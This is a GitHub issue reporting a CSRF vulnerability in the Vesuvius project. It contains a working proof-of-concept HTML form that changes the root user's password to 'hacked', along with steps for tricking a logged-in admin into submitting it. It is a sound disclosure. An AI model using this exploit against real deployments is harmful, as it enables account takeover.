Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

CSRF vulnarability #56

Open
sampathLiyanage opened this issue Mar 13, 2014 · 0 comments
Open

CSRF vulnarability #56

sampathLiyanage opened this issue Mar 13, 2014 · 0 comments

Comments

@sampathLiyanage
Copy link
Contributor

I checked security of Vesuvius and found a critical vulnerability. Vesuvius forms don't have CSRF tokens...!!! This allows someone to submit vesuvius forms from any webpage outside vesuvius.

for an example if an attacker wants to change the password of the user "root", the attacker can change it by following the steps below.

  1. host a website and create the following form on a webpage.
    < form method="post"
    action="http://localhost/vesuvius/www/admin?passwdp&amp;tabid=5" name="form0">
    < input type="hidden" name="user" value="1">
    < input type="hidden" name="password" value="hacked">
    < input type="hidden" name="re_password" value="hacked">
    < input type="submit" value="Click Here">< /form>

    note: form action changes according to the web address of vesuvius

  2. send the link of the webpage to vesuvius admin and make admin clicks the button. If admin clicks the button while he is logged in to vesuvius, the password of the user "root" will be changed to "hacked" immediately...!!!

    With a bit of social engineering this can be achieved easily.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@sampathLiyanage